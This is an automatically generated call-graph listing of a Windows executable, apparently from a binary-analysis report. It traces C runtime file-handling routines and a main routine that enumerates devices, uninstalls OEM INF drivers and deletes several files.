2d8f0e 50462 2c406b 11 API calls __wcsicmp_l 50406->50462 50421 2cfabb 50407->50421 50410 2d8f3b 50411 2d8f4f 50410->50411 50412 2d8f42 50410->50412 50414 2d8f76 50411->50414 50415 2d8f56 50411->50415 50463 2be629 70 API calls __getptd_noexit 50412->50463 50439 2d8fb2 50414->50439 50464 2be629 70 API calls __getptd_noexit 50415->50464 50420 2d8f19 ___lock_fhandle @_EH4_CallFilterFunc@8 50420->50387 50422 2cfac7 ___lock_fhandle 50421->50422 50466 2c703b 50422->50466 50424 2cfb4a 50473 2cfbe5 50424->50473 50425 2cfb51 50506 2c4287 70 API calls _malloc 50425->50506 50428 2cfb58 50428->50424 50430 2cfb66 InitializeCriticalSectionAndSpinCount 50428->50430 50429 2cfbda ___lock_fhandle 50429->50410 50431 2cfb99 EnterCriticalSection 50430->50431 50432 2cfb86 50430->50432 50431->50424 50507 2be216 70 API calls 2 library calls 50432->50507 50436 2cfad5 50436->50424 50436->50425 50476 2c6f79 50436->50476 50504 2bd58a 71 API calls __lock 50436->50504 50505 2bd5f8 LeaveCriticalSection LeaveCriticalSection _doexit 50436->50505 50437 2cfb8e 50437->50424 50440 2d8fd4 50439->50440 50441 2d8fe8 50440->50441 50453 2d8fff 50440->50453 50567 2be629 70 API calls __getptd_noexit 50441->50567 50443 2d919c 50446 2d91f0 50443->50446 50447 2d9202 50443->50447 50444 2d8fed 50568 2c406b 11 API calls __wcsicmp_l 50444->50568 50573 2be629 70 API calls __getptd_noexit 50446->50573 50564 2d9a41 50447->50564 50450 2d8f81 50465 2d8f9c LeaveCriticalSection LeaveCriticalSection __fseeki64 50450->50465 50451 2d91f5 50574 2c406b 11 API calls __wcsicmp_l 50451->50574 50453->50443 50453->50446 50569 2d9dcb 80 API calls __fassign 50453->50569 50455 2d916b 50455->50446 50570 2d9c65 89 API calls __mbsnbicmp_l 50455->50570 50457 2d9195 50457->50443 50571 2d9c65 89 API calls __mbsnbicmp_l 50457->50571 50459 2d91b4 50459->50443 50572 2d9c65 89 API calls __mbsnbicmp_l 50459->50572 50461->50406 50462->50420 50463->50420 50464->50420 50465->50420 50467 2c7050 50466->50467 50468 2c7063 EnterCriticalSection 50466->50468 50469 2c6f79 __mtinitlocknum 69 API calls 50467->50469 50468->50436 50470 2c7056 50469->50470 50470->50468 50508 2bee2d 50470->50508 50555 2c6f62 LeaveCriticalSection 50473->50555 50475 2cfbec 50475->50429 50477 2c6f85 ___lock_fhandle 50476->50477 50478 2c6fad 50477->50478 50479 2c6f95 50477->50479 50485 2c6fbb ___lock_fhandle 50478->50485 50493 2c6fab 50478->50493 50556 2c8466 70 API calls 2 library calls 50479->50556 50481 2c6f9a 50557 2c82b7 70 API calls 8 library calls 50481->50557 50484 2c6fc6 50487 2c6fdc 50484->50487 50488 2c6fcd 50484->50488 50485->50436 50486 2c6fa1 50490 2beb8b _doexit 3 API calls 50486->50490 50489 2c703b __lock 69 API calls 50487->50489 50559 2be629 70 API calls __getptd_noexit 50488->50559 50492 2c6fe3 50489->50492 50490->50493 50495 2c6feb InitializeCriticalSectionAndSpinCount 50492->50495 50496 2c7016 50492->50496 50493->50478 50558 2c4287 70 API calls _malloc 50493->50558 50494 2c6fd2 50494->50485 50497 2c6ffb 50495->50497 50498 2c7007 50495->50498 50562 2be216 70 API calls 2 library calls 50496->50562 50560 2be216 70 API calls 2 library calls 50497->50560 50563 2c7032 LeaveCriticalSection _doexit 50498->50563 50501 2c7001 50561 2be629 70 API calls __getptd_noexit 50501->50561 50504->50436 50505->50436 50506->50428 50507->50437 50515 2c8466 70 API calls 2 library calls 50508->50515 50510 2bee37 50519 2c82b7 70 API calls 8 library calls 50510->50519 50512 2bee3f 50516 2bedf9 50512->50516 50515->50510 50520 2beca3 50516->50520 50518 2bee0a 50519->50512 50521 2becaf ___lock_fhandle 50520->50521 50522 2c703b __lock 65 API calls 50521->50522 50523 2becb6 50522->50523 50524 2bece1 DecodePointer 50523->50524 50530 2bed60 50523->50530 50526 2becf8 DecodePointer 50524->50526 50524->50530 50541 2bed0b 50526->50541 50528 2beddd ___lock_fhandle 50528->50518 50549 2bedce 50530->50549 50531 2bedc5 50533 2beb8b _doexit 3 API calls 50531->50533 50534 2bedce 50533->50534 50535 2beddb 50534->50535 50554 2c6f62 LeaveCriticalSection 50534->50554 50535->50518 50536 2bed22 DecodePointer 50544 2c5bd4 EncodePointer 50536->50544 50539 2bed2d 50545 1d1281 50539->50545 50541->50530 50541->50536 50543 2c5bd4 EncodePointer 50541->50543 50543->50541 50544->50539 50546 1d128d 50545->50546 50547 1d12a8 DecodePointer DecodePointer 50545->50547 50546->50547 50548 1cf3ce RtlReleaseActivationContext LocalFree EnterCriticalSection LeaveCriticalSection 50546->50548 50547->50541 50548->50547 50550 2bedd4 50549->50550 50552 2bedae 50549->50552 50551 2c6f62 _doexit LeaveCriticalSection 50550->50551 50551->50552 50552->50528 50553 2c6f62 LeaveCriticalSection 50552->50553 50553->50531 50554->50535 50555->50475 50556->50481 50557->50486 50558->50484 50559->50494 50560->50501 50561->50498 50562->50498 50563->50494 50575 2d997d 50564->50575 50566 2d9a5c 50566->50450 50567->50444 50568->50450 50569->50455 50570->50457 50571->50459 50572->50443 50573->50451 50574->50450 50577 2d9989 ___lock_fhandle 50575->50577 50576 2d999c 50694 2be629 70 API calls __getptd_noexit 50576->50694 50577->50576 50580 2d99d2 50577->50580 50579 2d99a1 50695 2c406b 11 API calls __wcsicmp_l 50579->50695 50586 2d9249 50580->50586 50583 2d99ec 50696 2d9a13 LeaveCriticalSection __unlock_fhandle 50583->50696 50585 2d99ab ___lock_fhandle 50585->50566 50587 2d9270 50586->50587 50697 2da056 50587->50697 50589 2d94fb 50723 2c4019 50589->50723 50591 2d92cb 50726 2be63c 70 API calls __getptd_noexit 50591->50726 50593 2d997c ___lock_fhandle 50596 2d999c 50593->50596 50602 2d99d2 50593->50602 50594 2d928c 50594->50589 50594->50591 50597 2d9326 50594->50597 50595 2d92d0 50727 2be629 70 API calls __getptd_noexit 50595->50727 50771 2be629 70 API calls __getptd_noexit 50596->50771 50604 2d93ad 50597->50604 50613 2d9380 50597->50613 50600 2d99a1 50772 2c406b 11 API calls __wcsicmp_l 50600->50772 50601 2d92da 50728 2c406b 11 API calls __wcsicmp_l 50601->50728 50606 2d9249 __tsopen_nolock 124 API calls 50602->50606 50729 2be63c 70 API calls __getptd_noexit 50604->50729 50608 2d99ec 50606->50608 50773 2d9a13 LeaveCriticalSection __unlock_fhandle 50608->50773 50609 2d93b2 50730 2be629 70 API calls __getptd_noexit 50609->50730 50612 2d99ab ___lock_fhandle 50612->50583 50704 2c35fa 50613->50704 50614 2d93bc 50731 2c406b 11 API calls __wcsicmp_l 50614->50731 50617 2d92e4 50617->50583 50618 2d943e 50619 2d9468 CreateFileA 50618->50619 50620 2d9447 50618->50620 50621 2d9505 GetFileType 50619->50621 50622 2d9495 50619->50622 50732 2be63c 70 API calls __getptd_noexit 50620->50732 50625 2d9556 50621->50625 50626 2d9512 GetLastError 50621->50626 50624 2d94ce GetLastError 50622->50624 50628 2d94a9 CreateFileA 50622->50628 50735 2be64f 70 API calls 3 library calls 50624->50735 50739 2c33c4 71 API calls 2 library calls 50625->50739 50737 2be64f 70 API calls 3 library calls 50626->50737 50627 2d944c 50733 2be629 70 API calls __getptd_noexit 50627->50733 50628->50621 50628->50624 50632 2d953b CloseHandle 50634 2d9549 50632->50634 50661 2d94f5 50632->50661 50633 2d9456 50734 2be629 70 API calls __getptd_noexit 50633->50734 50738 2be629 70 API calls __getptd_noexit 50634->50738 50638 2d9574 50641 2d95ca 50638->50641 50642 2d9639 50638->50642 50643 2d9868 50638->50643 50640 2d954e 50640->50661 50740 2d05cd 72 API calls 2 library calls 50641->50740 50642->50643 50657 2d9793 50642->50657 50665 2d96e3 50642->50665 50643->50589 50645 2d98f2 CloseHandle CreateFileA 50643->50645 50649 2d991f GetLastError 50645->50649 50693 2d97fe 50645->50693 50646 2d95d4 50647 2d95dd 50646->50647 50648 2d95f6 50646->50648 50741 2be63c 70 API calls __getptd_noexit 50647->50741 50757 2cfbee 80 API calls 6 library calls 50648->50757 50769 2be64f 70 API calls 3 library calls 50649->50769 50653 2d992b 50770 2c3445 71 API calls 2 library calls 50653->50770 50655 2d9607 50656 2d9620 50655->50656 50758 2d9de5 104 API calls 4 library calls 50655->50758 50692 2d95ea 50656->50692 50759 2d05cd 72 API calls 2 library calls 50656->50759 50657->50643 50663 2d97b0 50657->50663 50667 2d9707 50657->50667 50736 2be629 70 API calls __getptd_noexit 50661->50736 50763 2c7952 72 API calls 2 library calls 50663->50763 50664 2d95e2 50664->50642 50664->50692 50665->50643 50665->50667 50668 2d9732 50665->50668 50691 2d974e 50665->50691 50667->50643 50667->50692 50768 2c776b 101 API calls 6 library calls 50667->50768 50760 2c7952 72 API calls 2 library calls 50668->50760 50669 2d97bb 50669->50667 50676 2d97c6 50669->50676 50671 2d980b 50673 2d982d 50671->50673 50681 2d9812 50671->50681 50672 2d97f1 50679 2c7f82 __close_nolock 73 API calls 50672->50679 50767 2d05cd 72 API calls 2 library calls 50673->50767 50674 2d9768 50674->50671 50674->50672 50674->50673 50680 2d978a 50674->50680 50674->50692 50764 2c7952 72 API calls 2 library calls 50676->50764 50684 2d97f8 50679->50684 50680->50643 50766 2d05cd 72 API calls 2 library calls 50681->50766 50682 2d973d 50682->50667 50686 2d9744 50682->50686 50683 2d97d0 50683->50643 50683->50692 50765 2be629 70 API calls __getptd_noexit 50684->50765 50761 2c7952 72 API calls 2 library calls 50686->50761 50690 2d981c 50690->50680 50690->50692 50691->50692 50762 2cfbee 80 API calls 6 library calls 50691->50762 50742 2c7f82 50692->50742 50693->50589 50694->50579 50695->50585 50696->50585 50698 2da077 50697->50698 50699 2da062 50697->50699 50698->50594 50774 2be629 70 API calls __getptd_noexit 50699->50774 50701 2da067 50775 2c406b 11 API calls __wcsicmp_l 50701->50775 50703 2da072 50703->50594 50705 2c3606 ___lock_fhandle 50704->50705 50706 2c6f79 __mtinitlocknum 70 API calls 50705->50706 50707 2c3616 50706->50707 50708 2c703b __lock 70 API calls 50707->50708 50709 2c361b ___lock_fhandle 50707->50709 50719 2c362a 50708->50719 50709->50618 50710 2c3775 50788 2c378a LeaveCriticalSection _doexit 50710->50788 50712 2c3702 50777 2c42cc 70 API calls __calloc_crt 50712->50777 50714 2c36aa EnterCriticalSection 50717 2c36ba LeaveCriticalSection 50714->50717 50714->50719 50715 2c703b __lock 70 API calls 50715->50719 50716 2c370b 50716->50710 50778 2c3534 50716->50778 50717->50719 50719->50710 50719->50712 50719->50714 50719->50715 50720 2c3680 InitializeCriticalSectionAndSpinCount 50719->50720 50776 2c36cc LeaveCriticalSection _doexit 50719->50776 50720->50719 50722 2c376c 50722->50710 50789 2c3ef0 50723->50789 50726->50595 50727->50601 50728->50617 50729->50609 50730->50614 50731->50617 50732->50627 50733->50633 50734->50617 50735->50661 50736->50589 50737->50632 50738->50640 50739->50638 50740->50646 50741->50664 50795 2c34cb 50742->50795 50744 2c7fe8 50808 2c3445 71 API calls 2 library calls 50744->50808 50746 2c7f92 50746->50744 50747 2c7fc6 50746->50747 50749 2c34cb __lseeki64_nolock 70 API calls 50746->50749 50747->50744 50750 2c34cb __lseeki64_nolock 70 API calls 50747->50750 50748 2c7ff0 50751 2c8012 50748->50751 50809 2be64f 70 API calls 3 library calls 50748->50809 50752 2c7fbd 50749->50752 50753 2c7fd2 CloseHandle 50750->50753 50751->50661 50755 2c34cb __lseeki64_nolock 70 API calls 50752->50755 50753->50744 50756 2c7fde GetLastError 50753->50756 50755->50747 50756->50744 50757->50655 50758->50656 50759->50664 50760->50682 50761->50691 50762->50674 50763->50669 50764->50683 50765->50693 50766->50690 50767->50683 50768->50667 50769->50653 50770->50693 50771->50600 50772->50612 50773->50612 50774->50701 50775->50703 50776->50719 50777->50716 50780 2c3540 ___lock_fhandle 50778->50780 50779 2c359a 50781 2c35bc ___lock_fhandle 50779->50781 50782 2c359f EnterCriticalSection 50779->50782 50780->50779 50783 2c703b __lock 70 API calls 50780->50783 50781->50722 50782->50781 50784 2c356c 50783->50784 50785 2c3588 50784->50785 50786 2c3575 InitializeCriticalSectionAndSpinCount 50784->50786 50787 2c35ca ___lock_fhandle LeaveCriticalSection 50785->50787 50786->50785 50787->50779 50788->50709 50790 2c3f0f _memset __call_reportfault 50789->50790 50791 2c3f2d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 50790->50791 50792 2c3ffb __call_reportfault 50791->50792 50793 2bc787 _wcsupr_s_l_stat 5 API calls 50792->50793 50794 2c4017 GetCurrentProcess TerminateProcess 50793->50794 50794->50593 50796 2c34d8 50795->50796 50797 2c34f0 50795->50797 50798 2be63c __free_osfhnd 70 API calls 50796->50798 50800 2be63c __free_osfhnd 70 API calls 50797->50800 50802 2c352f 50797->50802 50799 2c34dd 50798->50799 50803 2be629 __lseeki64_nolock 70 API calls 50799->50803 50801 2c3501 50800->50801 50804 2be629 __lseeki64_nolock 70 API calls 50801->50804 50802->50746 50805 2c34e5 50803->50805 50806 2c3509 50804->50806 50805->50746 50807 2c406b __wcsicmp_l 11 API calls 50806->50807 50807->50805 50808->50748 50809->50751 50811 2bd55b 50810->50811 50812 2bd57d EnterCriticalSection 50810->50812 50811->50812 50813 2bd563 50811->50813 50814 2bd573 50812->50814 50815 2c703b __lock 70 API calls 50813->50815 50816 2bdfee 50814->50816 50815->50814 50817 2bdfff 50816->50817 50818 2be013 50816->50818 50875 2be629 70 API calls __getptd_noexit 50817->50875 50824 2be00f 50818->50824 50835 2bde08 50818->50835 50820 2be004 50876 2c406b 11 API calls __wcsicmp_l 50820->50876 50834 2be0c7 LeaveCriticalSection LeaveCriticalSection __fseeki64 50824->50834 50828 2be02d 50852 2c801e 50828->50852 50830 2be033 50830->50824 50877 2be216 70 API calls 2 library calls 50830->50877 50832->50393 50833->50399 50834->50399 50836 2bde21 50835->50836 50840 2bde43 50835->50840 50837 2c3793 __fputwc_nolock 70 API calls 50836->50837 50836->50840 50838 2bde3c 50837->50838 50878 2c776b 101 API calls 6 library calls 50838->50878 50841 2c7e78 50840->50841 50842 2c7e88 50841->50842 50843 2be027 50841->50843 50842->50843 50879 2be216 70 API calls 2 library calls 50842->50879 50845 2c3793 50843->50845 50846 2c379f 50845->50846 50847 2c37b4 50845->50847 50880 2be629 70 API calls __getptd_noexit 50846->50880 50847->50828 50849 2c37a4 50881 2c406b 11 API calls __wcsicmp_l 50849->50881 50851 2c37af 50851->50828 50853 2c802a ___lock_fhandle 50852->50853 50854 2c804d 50853->50854 50855 2c8032 50853->50855 50856 2c8059 50854->50856 50861 2c8093 50854->50861 50882 2be63c 70 API calls __getptd_noexit 50855->50882 50884 2be63c 70 API calls __getptd_noexit 50856->50884 50859 2c8037 50883 2be629 70 API calls __getptd_noexit 50859->50883 50860 2c805e 50885 2be629 70 API calls __getptd_noexit 50860->50885 50864 2c3534 ___lock_fhandle 72 API calls 50861->50864 50866 2c8099 50864->50866 50865 2c8066 50886 2c406b 11 API calls __wcsicmp_l 50865->50886 50868 2c80a7 50866->50868 50869 2c80b3 50866->50869 50872 2c7f82 __close_nolock 73 API calls 50868->50872 50887 2be629 70 API calls __getptd_noexit 50869->50887 50871 2c803f ___lock_fhandle 50871->50830 50873 2c80ad 50872->50873 50888 2c80da LeaveCriticalSection __unlock_fhandle 50873->50888 50875->50820 50876->50824 50877->50824 50878->50840 50879->50843 50880->50849 50881->50851 50882->50859 50883->50871 50884->50860 50885->50865 50886->50871 50887->50873 50888->50871 50889 1c1020 GetCommandLineW GetModuleHandleW 50985 1ca2c5 SetErrorMode SetErrorMode 50889->50985 50892 1c107a 50998 1c8d50 50892->50998 50896 1c10ca GetWindowsDirectoryW 50898 1c10de GetLastError 50896->50898 50903 1c119e _wcsnlen 50896->50903 51109 1c6400 71 API calls 50898->51109 50899 1c10c4 50899->50896 50901 1c10f4 51110 1c2e70 108 API calls 2 library calls 50901->51110 50905 1c1a89 moneypunct 50903->50905 51007 1c2d90 50903->51007 50904 1c10fd 51111 1c8330 71 API calls 50904->51111 50910 1c114e 50913 2bc787 _wcsupr_s_l_stat 5 API calls 50910->50913 50911 1c1108 50911->50910 51112 1c8570 71 API calls 2 library calls 50911->51112 50915 1c119a 50913->50915 50914 1c16d0 51063 1c2540 SetupDiGetClassDevsW 50914->51063 50919 1c2d90 70 API calls 50920 1c16ed 50919->50920 50922 1c2d90 70 API calls 50920->50922 50923 1c1709 DeleteFileW 50922->50923 50924 1c172f 50923->50924 50925 1c2d90 70 API calls 50924->50925 50926 1c1751 DeleteFileW 50925->50926 50928 1c1771 50926->50928 50929 1c2d90 70 API calls 50928->50929 50930 1c1793 DeleteFileW 50929->50930 50931 1c17b3 50930->50931 50932 1c2d90 70 API calls 50931->50932 50934 1c17d5 DeleteFileW 50932->50934 50935 1c17f5 50934->50935 50936 1c2d90 70 API calls 50935->50936 50937 1c1817 DeleteFileW 50936->50937 50939 1c1837 50937->50939 50940 1c2d90 70 API calls 50939->50940 50944 1c1859 DeleteFileW 50940->50944 50941 1c8b70 70 API calls ctype 50971 1c1217 _memset _wcsrchr _wcsupr_s_l_stat 50941->50971 50942 1c13be lstrlenW 50942->50971 50945 1c1879 50944->50945 50946 1c2d90 70 API calls 50945->50946 50947 1c189b DeleteFileW 50946->50947 50949 1c18bb 50947->50949 50948 1c13dd WideCharToMultiByte 50948->50971 50950 1c2d90 70 API calls 50949->50950 50951 1c18dd DeleteFileW 50950->50951 50952 1c18fd 50951->50952 50953 1c2d90 70 API calls 50952->50953 50954 1c191f DeleteFileW 50953->50954 50956 1c193f 50954->50956 50955 1c148e lstrlenW 50955->50971 50958 1c2d90 70 API calls 50956->50958 50957 1c8570 71 API calls 50957->50971 50959 1c1961 DeleteFileW 50958->50959 50960 1c1981 50959->50960 50962 1c2d90 70 API calls 50960->50962 50961 1c14ad WideCharToMultiByte 50961->50971 50964 1c19a3 DeleteFileW 50962->50964 50963 1c6400 71 API calls 50963->50971 50965 1c19c3 50964->50965 50966 1c2d90 70 API calls 50965->50966 50967 1c19e5 DeleteFileW 50966->50967 50968 1c1a05 50967->50968 50970 1c2d90 70 API calls 50968->50970 50969 1c153a SetupUninstallOEMInfW 51129 1c6400 71 API calls 50969->51129 50973 1c1a27 DeleteFileW 50970->50973 50971->50914 50971->50941 50971->50942 50971->50948 50971->50955 50971->50957 50971->50961 50971->50963 50971->50969 50979 1c15c3 lstrlenW 50971->50979 50980 1c15e2 WideCharToMultiByte 50971->50980 50981 1c8330 71 API calls 50971->50981 50982 1c167b DeleteFileW DeleteFileW 50971->50982 50983 1c1655 50971->50983 51031 1c1ff0 50971->51031 51113 2be250 70 API calls 2 library calls 50971->51113 51114 1c80e0 70 API calls 2 library calls 50971->51114 51115 1c2c70 70 API calls 50971->51115 51116 1c8070 50971->51116 51121 1c8c60 50971->51121 51128 1c8570 71 API calls 2 library calls 50971->51128 51130 1c3050 108 API calls 2 library calls 50971->51130 50975 1c1a47 50973->50975 50977 1c2d90 70 API calls 50975->50977 50978 1c1a69 DeleteFileW 50977->50978 50978->50905 50979->50971 50980->50971 50981->50971 50982->50971 50982->50983 50983->50971 51131 1c8570 71 API calls 2 library calls 50983->51131 50986 1cf877 ctype 31 API calls 50985->50986 50987 1ca2e2 50986->50987 51132 1cf00f GetModuleFileNameW 50987->51132 50990 1cf877 ctype 31 API calls 50991 1ca2f7 50990->50991 50992 1ca314 50991->50992 51142 1ca0e9 50991->51142 50994 1cf877 ctype 31 API calls 50992->50994 50995 1ca319 50994->50995 50996 1c106c 50995->50996 51165 1cc207 33 API calls ctype 50995->51165 50996->50892 51103 2bcdb6 108 API calls 7 library calls 50996->51103 51000 1c8d7f ctype 50998->51000 50999 1c8dd0 51002 1c8c60 ctype 70 API calls 50999->51002 51000->50999 51001 1c8db8 51000->51001 51204 1cae2a 31 API calls ctype 51001->51204 51004 1c1097 51002->51004 51004->50896 51104 1c8b70 51004->51104 51005 1c8dc1 51005->51004 51205 1c8850 76 API calls 3 library calls 51005->51205 51008 1c2dcf ctype 51007->51008 51206 1c3ef0 51008->51206 51011 1c1b60 51012 1c1b98 51011->51012 51211 1c2ca0 51012->51211 51014 1c1baa 51219 1c5e30 51014->51219 51019 1c1f85 ctype 51019->50971 51021 1c1fd1 51285 2d8541 71 API calls 2 library calls 51021->51285 51024 1c1fe5 51027 1c1db7 GetFileAttributesW 51029 1c1c2f 51027->51029 51028 1cba35 72 API calls 51028->51029 51029->51019 51029->51021 51029->51028 51030 1c1b60 101 API calls 51029->51030 51254 1cb3bb 51029->51254 51260 1cbace 51029->51260 51264 2bd45b 51029->51264 51267 1c2d20 51029->51267 51275 1cba35 51029->51275 51030->51029 51032 1c8d50 105 API calls 51031->51032 51033 1c203e 51032->51033 51034 1c8d50 105 API calls 51033->51034 51035 1c2050 51034->51035 51036 1c8d50 105 API calls 51035->51036 51037 1c2063 51036->51037 51038 1c8d50 105 API calls 51037->51038 51039 1c2076 SetupOpenInfFileW 51038->51039 51040 1c209a 51039->51040 51041 1c2145 SetupFindFirstLineW 51039->51041 51040->50971 51042 1c215f 51041->51042 51043 1c2209 SetupCloseInfFile 51041->51043 51369 1c2a40 74 API calls 2 library calls 51042->51369 51045 1c222b 51043->51045 51045->50971 51046 1c2172 51046->51043 51370 1c80e0 70 API calls 2 library calls 51046->51370 51048 1c218c 51371 1c22c0 123 API calls 51048->51371 51050 1c2196 51051 1c21fa 51050->51051 51372 1c2a40 74 API calls 2 library calls 51050->51372 51051->51043 51053 1c21ae 51053->51043 51373 1c2af0 70 API calls 51053->51373 51055 1c21c3 51056 1c5e30 70 API calls 51055->51056 51057 1c21d5 51056->51057 51374 1c8000 70 API calls ctype 51057->51374 51059 1c21e3 51375 1c80e0 70 API calls 2 library calls 51059->51375 51061 1c21f4 51376 1c22c0 123 API calls 51061->51376 51066 1c2586 ctype 51063->51066 51079 1c2a0e 51063->51079 51064 2bc787 _wcsupr_s_l_stat 5 API calls 51065 1c16d5 51064->51065 51065->50919 51067 1c25b0 SetupDiEnumDeviceInfo 51066->51067 51068 1c2664 SetupDiGetDeviceRegistryPropertyW 51067->51068 51069 1c25d0 GetLastError 51067->51069 51071 1c2687 GetLastError 51068->51071 51101 1c2662 _wcsupr_s_l_stat 51068->51101 51070 1c25e0 GetLastError 51069->51070 51088 1c2659 51069->51088 51073 1c25ed GetLastError 51070->51073 51070->51088 51072 1c26ea GetLastError 51071->51072 51074 1c2694 GetLastError 51071->51074 51076 1c29c2 SetupDiEnumDeviceInfo 51072->51076 51072->51101 51377 1c6400 71 API calls 51073->51377 51074->51073 51078 1c269f 51074->51078 51075 1c29f3 SetupDiDestroyDeviceInfoList 51075->51079 51076->51088 51076->51101 51081 1c26ad LocalAlloc 51078->51081 51082 1c26a6 LocalFree 51078->51082 51079->51064 51080 1c25ff 51378 1c2e70 108 API calls 2 library calls 51080->51378 51081->51073 51083 1c26c5 SetupDiGetDeviceRegistryPropertyW 51081->51083 51082->51081 51083->51071 51083->51101 51085 1c2608 51379 1c8330 71 API calls 51085->51379 51087 1c8c60 ctype 70 API calls 51087->51101 51088->51075 51089 1c2613 51089->51088 51380 1c8570 71 API calls 2 library calls 51089->51380 51092 1c8b70 ctype 70 API calls 51092->51101 51093 1c282a lstrlenW 51093->51101 51094 1c2849 WideCharToMultiByte 51094->51101 51095 1c8330 71 API calls 51095->51101 51096 1c28d9 lstrlenW 51096->51101 51098 1c6400 71 API calls 51098->51101 51099 1c28fb WideCharToMultiByte 51099->51101 51100 1c298b SetupDiCallClassInstaller 51100->51101 51101->51068 51101->51072 51101->51076 51101->51087 51101->51088 51101->51092 51101->51093 51101->51094 51101->51095 51101->51096 51101->51098 51101->51099 51101->51100 51381 2bd2a1 81 API calls __wcsupr_s_l 51101->51381 51382 1c8570 71 API calls 2 library calls 51101->51382 51383 1c8570 71 API calls 2 library calls 51101->51383 51103->50892 51105 1c8b80 51104->51105 51108 1c8b93 ctype 51105->51108 51384 1c8a90 51105->51384 51108->50899 51109->50901 51110->50904 51111->50911 51112->50910 51113->50971 51114->50971 51115->50971 51117 1c8081 ctype 51116->51117 51118 1c808e 51117->51118 51119 2bce5d _memcpy_s 70 API calls 51117->51119 51118->50971 51120 1c80d4 51119->51120 51120->50971 51122 1c8c72 ctype 51121->51122 51123 1c8c7f 51121->51123 51122->50971 51124 1c8b70 ctype 70 API calls 51123->51124 51126 2bce5d _memcpy_s 70 API calls 51123->51126 51127 1c8cfa 51123->51127 51394 2bced2 70 API calls 3 library calls 51123->51394 51124->51123 51126->51123 51127->50971 51128->50969 51129->50971 51130->50971 51131->50982 51133 1cf0ee 51132->51133 51134 1cf050 51132->51134 51135 2bc787 _wcsupr_s_l_stat 5 API calls 51133->51135 51136 1cf064 CreateActCtxWWorker 51134->51136 51137 1cf057 SetLastError 51134->51137 51138 1ca2f2 51135->51138 51139 1cf0ae CreateActCtxWWorker 51136->51139 51140 1cf0c7 51136->51140 51137->51133 51138->50990 51139->51140 51140->51133 51141 1cf0d0 CreateActCtxWWorker 51140->51141 51141->51133 51143 1cf877 ctype 31 API calls 51142->51143 51144 1ca108 GetModuleFileNameW 51143->51144 51145 1ca130 51144->51145 51146 1ca139 PathFindExtensionW 51145->51146 51174 1cfc61 RaiseException moneypunct __CxxThrowException@8 51145->51174 51148 1ca155 51146->51148 51149 1ca150 51146->51149 51166 1ca0a3 51148->51166 51175 1cfc61 RaiseException moneypunct __CxxThrowException@8 51149->51175 51152 1ca174 51153 1ca17d 51152->51153 51176 1cfc61 RaiseException moneypunct __CxxThrowException@8 51152->51176 51159 1ca18f ctype 51153->51159 51177 2bf65f 70 API calls 4 library calls 51153->51177 51156 1cadc2 105 API calls 51156->51159 51158 1ca2b6 51161 2bc787 _wcsupr_s_l_stat 5 API calls 51158->51161 51159->51156 51159->51158 51163 2bf65f 70 API calls __wcsdup 51159->51163 51178 1cacc7 RaiseException __CxxThrowException@8 51159->51178 51179 2be545 51159->51179 51188 2bf5ea 51159->51188 51162 1ca2c3 51161->51162 51162->50992 51163->51159 51165->50996 51167 1ca0ae 51166->51167 51168 1ca0b3 PathFindFileNameW 51166->51168 51169 1cacff ~_Task_impl 2 API calls 51167->51169 51170 1ca0cc 51168->51170 51171 1ca0c2 lstrlenW 51168->51171 51169->51168 51197 2be250 70 API calls 2 library calls 51170->51197 51173 1ca0da ctype 51171->51173 51173->51152 51174->51146 51175->51148 51176->51153 51177->51159 51180 2be55a 51179->51180 51181 2be553 51179->51181 51198 2be629 70 API calls __getptd_noexit 51180->51198 51181->51180 51186 2be57b 51181->51186 51183 2be55f 51199 2c406b 11 API calls __wcsicmp_l 51183->51199 51185 2be569 51185->51159 51186->51185 51200 2be629 70 API calls __getptd_noexit 51186->51200 51189 2bf5f8 51188->51189 51190 2bf5ff 51188->51190 51189->51190 51195 2bf634 51189->51195 51201 2be629 70 API calls __getptd_noexit 51190->51201 51192 2bf604 51202 2c406b 11 API calls __wcsicmp_l 51192->51202 51194 2bf60e 51194->51159 51195->51194 51203 2be629 70 API calls __getptd_noexit 51195->51203 51197->51173 51198->51183 51199->51185 51200->51183 51201->51192 51202->51194 51203->51192 51204->51005 51205->51004 51207 1c3f03 51206->51207 51208 2bce5d 70 API calls _memcpy_s 51207->51208 51209 1c8b70 ctype 70 API calls 51207->51209 51210 1c120f 51207->51210 51208->51207 51209->51207 51210->51011 51212 1c2cb7 51211->51212 51213 1c2cc2 51212->51213 51215 1c2cd8 ctype 51212->51215 51286 1c80e0 70 API calls 2 library calls 51213->51286 51287 1c4fa0 70 API calls 2 library calls 51215->51287 51216 1c2ccd 51216->51014 51218 1c2d0c 51218->51014 51220 1c5e51 _wcsnlen 51219->51220 51221 1c8b70 ctype 70 API calls 51220->51221 51223 1c1c22 51220->51223 51288 2bce5d 51220->51288 51221->51220 51224 1cb7f2 51223->51224 51225 1cb817 ctype 51224->51225 51226 1cb85d lstrlenW 51225->51226 51227 1cb820 51225->51227 51226->51227 51242 1cb868 ctype 51226->51242 51229 1c8e6a std::_Mutex::_Mutex 70 API calls 51227->51229 51228 1cb86d SetLastError 51253 1cb94b 51228->51253 51230 1cb834 51229->51230 51232 2be545 _wcsupr_s_l_stat 70 API calls 51230->51232 51231 2bc787 _wcsupr_s_l_stat 5 API calls 51233 1cb95b 51231->51233 51234 1cb842 ctype 51232->51234 51233->51029 51235 1cb87a FindFirstFileW 51234->51235 51236 1cb856 51234->51236 51238 1cb880 51235->51238 51300 1cb3fe GetModuleHandleW GetProcAddress FindFirstFileW 51236->51300 51240 1cb888 GetLastError 51238->51240 51241 1cb89a 51238->51241 51239 1cb85b 51239->51238 51240->51242 51301 1c8bd0 70 API calls ctype 51241->51301 51242->51228 51244 1cb8a5 51302 2bffb4 79 API calls 6 library calls 51244->51302 51246 1cb8d9 51246->51242 51247 1cb8f6 51246->51247 51303 2bf9c8 70 API calls 3 library calls 51247->51303 51249 1cb919 ctype 51304 2bfbda 70 API calls 2 library calls 51249->51304 51251 1cb938 ctype 51305 1c8170 EnterCriticalSection std::_Lockit::_Lockit _wcsnlen 51251->51305 51253->51231 51255 1cb3ca 51254->51255 51256 1cb3c6 51254->51256 51257 1cb3df FindNextFileW 51255->51257 51258 1c8e6a std::_Mutex::_Mutex 70 API calls 51255->51258 51256->51029 51257->51029 51259 1cb3db 51258->51259 51259->51257 51261 1cbada __EH_prolog3 ctype 51260->51261 51263 1cbb10 ~_Task_impl 51261->51263 51306 1c8d10 70 API calls ctype 51261->51306 51263->51029 51307 2bd428 51264->51307 51268 1c2d36 51267->51268 51269 1c2d3f 51268->51269 51272 1c2d54 